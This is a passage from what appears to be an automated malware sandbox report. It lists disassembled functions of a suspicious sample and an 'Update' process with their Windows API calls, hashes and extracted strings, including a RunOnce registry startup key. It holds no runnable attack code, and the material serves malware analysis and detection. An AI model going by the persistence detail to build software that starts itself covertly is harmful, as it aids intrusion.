                                                                      • Part of subcall function 0022C6CB: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0022C6FA
                                                                      • Part of subcall function 0022C6CB: ___AdjustPointer.LIBCMT ref: 0022C715
                                                                    • _UnwindNestedFrames.LIBCMT ref: 0022C793
                                                                    • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 0022C7A4
                                                                    • CallCatchBlock.LIBVCRUNTIME ref: 0022C7CC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                    • String ID:
                                                                    • API String ID: 737400349-0
                                                                    • Opcode ID: e6e350666a2120b309a7001c651facae3f5a153cc18b9c02dd0ce685658859b6
                                                                    • Instruction ID: aaf3068637c9d7fb629e123ff52674640628a7ee46efef07b822eeb7ae7acbd5
                                                                    • Opcode Fuzzy Hash: e6e350666a2120b309a7001c651facae3f5a153cc18b9c02dd0ce685658859b6
                                                                    • Instruction Fuzzy Hash: 6E01C532510119BBDF126E95EC85DEF7B69EF88754F144114FA0856121C732E871AFA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • WriteConsoleW.KERNEL32(?,?,?,00000000,?,?,0023B692,?,00000001,?,?,?,0023A0BC), ref: 0023C8DC
                                                                    • GetLastError.KERNEL32(?,0023B692,?,00000001,?,?,?,0023A0BC), ref: 0023C8E8
                                                                      • Part of subcall function 0023C8AE: CloseHandle.KERNEL32(FFFFFFFE,0023C8F8,?,0023B692,?,00000001,?,?,?,0023A0BC), ref: 0023C8BE
                                                                    • ___initconout.LIBCMT ref: 0023C8F8
                                                                      • Part of subcall function 0023C870: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0023C89F,0023B67F,?,?,0023A0BC), ref: 0023C883
                                                                    • WriteConsoleW.KERNEL32(?,?,?,00000000,?,0023B692,?,00000001,?,?,?,0023A0BC), ref: 0023C90D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                    • String ID:
                                                                    • API String ID: 2744216297-0
                                                                    • Opcode ID: 1fdc2ef932d12e7607b3443f0ef7678677ef7780504dde15dd81eec57fe24cf1
                                                                    • Instruction ID: b8021146f38b18264bd46351a66e6fb63a2b0c4daea6ed0ed53c9b22551c5e87
                                                                    • Opcode Fuzzy Hash: 1fdc2ef932d12e7607b3443f0ef7678677ef7780504dde15dd81eec57fe24cf1
                                                                    • Instruction Fuzzy Hash: B9F01C3A810115BBCF222F95FD09E9A3F76EB093A0F114020FA1995220C6328930EBD1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • _free.LIBCMT ref: 00232065
                                                                      • Part of subcall function 0023363A: HeapFree.KERNEL32(00000000,00000000,?,00236D47,?,00000000,?,?,?,00236D6E,?,00000007,?,?,002371E8,?), ref: 00233650
                                                                      • Part of subcall function 0023363A: GetLastError.KERNEL32(?,?,00236D47,?,00000000,?,?,?,00236D6E,?,00000007,?,?,002371E8,?,?), ref: 00233662
                                                                    • _free.LIBCMT ref: 00232078
                                                                    • _free.LIBCMT ref: 00232089
                                                                    • _free.LIBCMT ref: 0023209A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 8ebfdc91ed0b36038f5222fcc26f8c047fb234e1396ccf8ba1741f73fde66def
                                                                    • Instruction ID: 8fdead40c0ce9a1e2bbc7ea348659a816e40251f50c527348fb2c81e9099fbbb
                                                                    • Opcode Fuzzy Hash: 8ebfdc91ed0b36038f5222fcc26f8c047fb234e1396ccf8ba1741f73fde66def
                                                                    • Instruction Fuzzy Hash: 52E0BFBA420165AF8613AF2AFD0E8457E65F7AA7247010145F82512331C731C721AECD
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • lstrcmpiW.KERNEL32(?,00247574,?,9E1BD041,?,?,?,?,?,0023E1C6,000000FF), ref: 002284E8
                                                                    • lstrcmpiW.KERNEL32(?,00247578,?,?,?,?,?,0023E1C6,000000FF), ref: 002284FE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: lstrcmpi
                                                                    • String ID:
                                                                    • API String ID: 1586166983-0
                                                                    • Opcode ID: fcd32aa0d6863d88576ed17e844d77d95f81fe7cb66fa49ff79469a63e1ca74c
                                                                    • Instruction ID: 52cd0e79e444ce1e348f2dddd3550e29c45435a568dd59e42274dd5627deebc6
                                                                    • Opcode Fuzzy Hash: fcd32aa0d6863d88576ed17e844d77d95f81fe7cb66fa49ff79469a63e1ca74c
                                                                    • Instruction Fuzzy Hash: 18D1E871D21239EBDB35DFA4EC84AEDB3B4AB18700F5400A6E609A7240DB70DEA5DF51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0022AC4E
                                                                      • Part of subcall function 0022C3D9: RaiseException.KERNEL32(?,?,?,0022AC70,?,?,00000000,?,?,?,?,?,0022AC70,?,00248920), ref: 0022C439
                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0022AC6B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: Exception@8Throw$ExceptionRaise
                                                                    • String ID: Unknown exception
                                                                    • API String ID: 3476068407-410509341
                                                                    • Opcode ID: cb68ed0285f330f2139cedbb3b592bdba4010f40f68f8dbdf8cdbcfc02f516f5
                                                                    • Instruction ID: 6c28607cae2dc6137f99a3643eb908268842014a27ad998dacc32a7f16a63fb5
                                                                    • Opcode Fuzzy Hash: cb68ed0285f330f2139cedbb3b592bdba4010f40f68f8dbdf8cdbcfc02f516f5
                                                                    • Instruction Fuzzy Hash: B6F0AF3493021EB78F14BAE8F806DAD736C5B10350BA08661B92596891EBB0DA3989D6
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104,80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce,00020006), ref: 0022189A
                                                                    Strings
                                                                    • SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00221868
                                                                    • SquirrelInstall, xrefs: 002218A8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: FileModuleName
                                                                    • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce$SquirrelInstall
                                                                    • API String ID: 514040917-3364363029
                                                                    • Opcode ID: b8c6b6d10e82cf41e4cf5f621fff4f72a1fd6db815eefb5de9fa3dbc3735dc67
                                                                    • Instruction ID: 724bc9ae1a3cf3238f3fc6b7e25027fcf93c5024083fcd9a6b853ed36d9e7300
                                                                    • Opcode Fuzzy Hash: b8c6b6d10e82cf41e4cf5f621fff4f72a1fd6db815eefb5de9fa3dbc3735dc67
                                                                    • Instruction Fuzzy Hash: E8016C71A5022CAFD714DF90EDC5EE9B378AB24300F5001A9A51592151DE705F588E41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2054248924.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_Update.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HAH$HAH$HAH$HAH$HAH$HAH$HAH$HAH$HAH$HAH$HAH$HAH$rT_H$wT_H
                                                                    • API String ID: 0-3823421185
                                                                    • Opcode ID: aecf3cddf46a9f7b005ffddd92b0b4d48dc98bbcce51c334378c9e0b2c07b01a
                                                                    • Instruction ID: c830e1a686a5b92082b2cc744ab4001ec95000c53b399e8a9b9735326e0d4e04
                                                                    • Opcode Fuzzy Hash: aecf3cddf46a9f7b005ffddd92b0b4d48dc98bbcce51c334378c9e0b2c07b01a
                                                                    • Instruction Fuzzy Hash: 25422631F1D90A4FE658A76CA8552B9B3D1FF947A0F14067AD44EC32C6DF3AA8038385
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2054248924.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_Update.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HAH$HAH$HAH$HAH$HAH$HAH
                                                                    • API String ID: 0-381444693
                                                                    • Opcode ID: 5a6c0b392d6e6b4133b5836d5b86bec36d8d92e55ff47e41fce3000e49042aa5
                                                                    • Instruction ID: f02221c559a1440229d83475326584881a6fa44e839a976d93941094359df3ec
                                                                    • Opcode Fuzzy Hash: 5a6c0b392d6e6b4133b5836d5b86bec36d8d92e55ff47e41fce3000e49042aa5
                                                                    • Instruction Fuzzy Hash: 2622B231B1CA094FE798EB2C9495675B3D2FFA8B50F04457AD44EC32D6EE2CAC428B45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2054248924.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_Update.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 3N_^$4N_^
                                                                    • API String ID: 0-2923934511
                                                                    • Opcode ID: 883d3b7e2ddd8cd4c50ece63c6aaf0b9079ca8e343d78f4d73783e4f4096f50d
                                                                    • Instruction ID: 5825103f5bf1b14b091c8ea66a3844a00bf347e180a92b7bb83c19814c352cd1
                                                                    • Opcode Fuzzy Hash: 883d3b7e2ddd8cd4c50ece63c6aaf0b9079ca8e343d78f4d73783e4f4096f50d
                                                                    • Instruction Fuzzy Hash: 33C1D93791F5625BD351B7BCB8911E67BA0EF413BDB0842B7D1C88D093DE1C648682A9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2054248924.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_Update.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a1782ece677d1f96a2e337387897ff341d16b914cf65c800dd474931581edea0
                                                                    • Instruction ID: 412c5901629ebdf570e95b6fc30cb40d10dcc4981ac9dec0208f4100a352d809
                                                                    • Opcode Fuzzy Hash: a1782ece677d1f96a2e337387897ff341d16b914cf65c800dd474931581edea0
                                                                    • Instruction Fuzzy Hash: CC82B070A28B498FD368DF1CC481971B7E1FB64714B24466EC48BC7A96DB35F8838B85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2054248924.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_Update.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HAH$HAH$HAH$HAH$HAH$HAH$HAH$HAH$HAH
                                                                    • API String ID: 0-3520357160
                                                                    • Opcode ID: 62a909d51341f7c19ec354d7f7001cbc3c0fd4bf116dee0ee15228a050b7874e
                                                                    • Instruction ID: 7c9398fb3764d81742e3a9c9ea3c4a149e73ea527bc659dabb3b575dc9d1fa8d
                                                                    • Opcode Fuzzy Hash: 62a909d51341f7c19ec354d7f7001cbc3c0fd4bf116dee0ee15228a050b7874e
                                                                    • Instruction Fuzzy Hash: 70A1C232E1DA4A4FF2A8E76C64556B5A3D2FF98790F44057AD40EC32C6DF2EAC428345
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2054248924.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_Update.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HAH$HAH$HAH$HAH$HAH$HAH$HAH$HAH
                                                                    • API String ID: 0-4024470385
                                                                    • Opcode ID: 874ef118f55312557ca6a014896a3ae9c36e51cbd69ecc26021e13c659984a02
                                                                    • Instruction ID: fc92ff9fa0f672efc0a575ecceff4ff992e79fc987833917353c90244dc744d1
                                                                    • Opcode Fuzzy Hash: 874ef118f55312557ca6a014896a3ae9c36e51cbd69ecc26021e13c659984a02
                                                                    • Instruction Fuzzy Hash: 4C02D331E1CA6A4FE7A8EB28945527573D1FF68B81F14017EC44ED32D6EF28AC828745
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2054248924.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_Update.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • API ID:
                                                                    • String ID: @
                                                                    • API String ID: 0-2766056989
                                                                    • Opcode ID: 53e82685ed35d57b45c8d4abb34e9d662b6aba2bfcdc56468be40edc867ca2ab
                                                                    • Instruction ID: 82fad44fcc91e67bb2d1d58305fc3489c297178719fec3a99810ae86fa744712
                                                                    • Opcode Fuzzy Hash: 53e82685ed35d57b45c8d4abb34e9d662b6aba2bfcdc56468be40edc867ca2ab
                                                                    • Instruction Fuzzy Hash: 24D1013042CB958FDB1ADF248490578BBA1FF52344F5446BDC5EB87982DB35B812CB82
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2054248924.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_Update.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HAH
                                                                    • API String ID: 0-1579723087
                                                                    • Opcode ID: 259bcdc2209f549348457ba1e6e820cb65307489d14aba31320dc4a0dfd19122
                                                                    • Instruction ID: db21495509a143f140dde4500b9d0040b7633320018e0e074439e9bfe64d95dd
                                                                    • Opcode Fuzzy Hash: 259bcdc2209f549348457ba1e6e820cb65307489d14aba31320dc4a0dfd19122
                                                                    • Instruction Fuzzy Hash: FCB1023060CA498FE798EB2CD499A6577E1FF59350B0406BAD08EC76E2DF28EC42C740
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2054248924.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_Update.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HAH
                                                                    • API String ID: 0-1579723087
                                                                    • Opcode ID: 57897df99c02a020c025b3fe400063e95d64089e77ce82a93ca9aee0c03f3a3a
                                                                    • Instruction ID: 27ec6dfab25bf30a3ab1474055afed95e132cf17ccf9dc70b2e2996cf8df2cf6
                                                                    • Opcode Fuzzy Hash: 57897df99c02a020c025b3fe400063e95d64089e77ce82a93ca9aee0c03f3a3a
                                                                    • Instruction Fuzzy Hash: 38916831A1DA490FE32DA768A8551B5B7E1FF84350F1406BED04EC31D7EE3A68838385
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2054248924.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_Update.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HAH
                                                                    • API String ID: 0-1579723087
                                                                    • Opcode ID: df1c57de16b81ab51e06bd6245e4e3c3dc616a78e2483cde0d3e50e99a5a1b81
                                                                    • Instruction ID: 9de3e2bc5f4f04e26f6a42af41c1db5b95eaf19aec40173dba60f288484644f0
                                                                    • Opcode Fuzzy Hash: df1c57de16b81ab51e06bd6245e4e3c3dc616a78e2483cde0d3e50e99a5a1b81
                                                                    • Instruction Fuzzy Hash: 0D81E232A0DA4A4FE7D8BB2C64512B537D1EFA5A90F1401BBD80DD72C7EE196C468385
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2054248924.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_Update.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: M_^p
                                                                    • API String ID: 0-1541879703
                                                                    • Opcode ID: a421457fbf40dca1505022d415f0340eb91af4ffeb4a8aa3a4a47886379757d8
                                                                    • Instruction ID: ec0f628d33cb9a176b3340173e70399db67ca2b22a545589c3913933a4efc8d3
                                                                    • Opcode Fuzzy Hash: a421457fbf40dca1505022d415f0340eb91af4ffeb4a8aa3a4a47886379757d8
                                                                    • Instruction Fuzzy Hash: 5891473091D6854FDB59EB3898121B9BFE0EF56350F1405BED08AC76C3DB28D806C781
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2054248924.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_Update.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: u
                                                                    • API String ID: 0-4067256894
                                                                    • Opcode ID: f8edf507ec0cc76acf24deb2e1489e724268482622e11a3ba121ab7892349e24
                                                                    • Instruction ID: 659ad7d1b47487b2a097a64602de23232a31f58b787343fae54ede1e393ce7db
                                                                    • Opcode Fuzzy Hash: f8edf507ec0cc76acf24deb2e1489e724268482622e11a3ba121ab7892349e24
                                                                    • Instruction Fuzzy Hash: 22811761E1FE864FE74AA33C2826575BBD1EF96A50F2801BED049C31D7DF1C6806835A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2054248924.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_Update.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0CH
                                                                    • API String ID: 0-3281614211
                                                                    • Opcode ID: e5fe779ae04fccd285e3d6d7888e32f52d2e6c9dd4d93ef3a0ec8fe15edf21db
                                                                    • Instruction ID: 00b213403c1c4c89c9d3e06690c72ee2aab9168a7c9756f993ca84a537b534bf
                                                                    • Opcode Fuzzy Hash: e5fe779ae04fccd285e3d6d7888e32f52d2e6c9dd4d93ef3a0ec8fe15edf21db
                                                                    • Instruction Fuzzy Hash: 67613332E1ED8A4FE395E778A8542B57BE1EF95240B5841BBC009C71DADF1DB8468384
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2054248924.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_Update.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: H
                                                                    • API String ID: 0-2852464175
                                                                    • Opcode ID: 5cc765847ae473877c975c28ac9361f62cff7fd75ebaabbacc17ad056ad4ca77
                                                                    • Instruction ID: c96a3f1608816a22b233c6ea60cf972d145f8f25e2f798ab7da8cf64480a7e44
                                                                    • Opcode Fuzzy Hash: 5cc765847ae473877c975c28ac9361f62cff7fd75ebaabbacc17ad056ad4ca77
                                                                    • Instruction Fuzzy Hash: 1A613532E1EA8A4FE759B73868554B53BA0EF61790F0841BAC40DC71D7EF1EAC068395
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2054248924.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_Update.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: u
                                                                    • API String ID: 0-4067256894
                                                                    • Opcode ID: e3e3ecde295cc58bcf98d50f7498469ee460806e176120ac128df2ccf9897dbf
                                                                    • Instruction ID: 1b34d39297b702617d3e97d43a9897d0c63928273db1ba6cceef395ab36d5f9c
                                                                    • Opcode Fuzzy Hash: e3e3ecde295cc58bcf98d50f7498469ee460806e176120ac128df2ccf9897dbf
                                                                    • Instruction Fuzzy Hash: 8B51D671F2ED468BF658A72C7856675A6D2FF98A94F64017AD00DC32C7EF1CAC01828D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2054248924.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_Update.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HAH
                                                                    • API String ID: 0-1579723087
                                                                    • Opcode ID: 050d15e91ff064628a38c83bb5c0413852037ed6a514d16da670f21df6db381f
                                                                    • Instruction ID: 766818748097d8853ce298b50b6b7984b3b117a24d022e1590b317cd079c1908
                                                                    • Opcode Fuzzy Hash: 050d15e91ff064628a38c83bb5c0413852037ed6a514d16da670f21df6db381f
                                                                    • Instruction Fuzzy Hash: CA612731A1DA8A4FE766EB6CA465274BBE2FF95340F0805FAC04DC71D7CE29AC458385
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2054248924.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_Update.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: _L_^
                                                                    • API String ID: 0-2052753700
                                                                    • Opcode ID: 79a77730715bd3321816c80bbb1b7870f5d518dece9db12b1b758cff30d7d5ef
                                                                    • Instruction ID: 9ee530939d4bc4674f943c978d4fe42d08bd69f1c6a91a91d794b444803a4776
                                                                    • Opcode Fuzzy Hash: 79a77730715bd3321816c80bbb1b7870f5d518dece9db12b1b758cff30d7d5ef
                                                                    • Instruction Fuzzy Hash: 0251DE37E1E5A25BD341B76CB4960FA7B60EF422BDB0C41B7D18C8E093DE0D544A82E9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2054248924.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_Update.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: H
                                                                    • API String ID: 0-2852464175
                                                                    • Opcode ID: 53eadb49f69d108cb089e0b57a447905c6ee8ffc527ec380f4d2edcfca1806e6
                                                                    • Instruction ID: 636e6a18a7b1fd781a5d3520abd9c398686d9c625a56e3559d43377ca3fa72c5
                                                                    • Opcode Fuzzy Hash: 53eadb49f69d108cb089e0b57a447905c6ee8ffc527ec380f4d2edcfca1806e6
                                                                    • Instruction Fuzzy Hash: 4B515672E1DA8A4FE395AB2C68591B97BE0EFA5290F0401BBD049C31D7DF2E6C068355
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2054248924.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_Update.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HAH
                                                                    • API String ID: 0-1579723087
                                                                    • Opcode ID: 338579600437e22c6acdbd3ea44a142b389635f6572d043eff3e4fefd434ffc2
                                                                    • Instruction ID: bf2d1fb59662c7109344399e42c83b1dd749fa2504525f63d4c2819b6abc1158
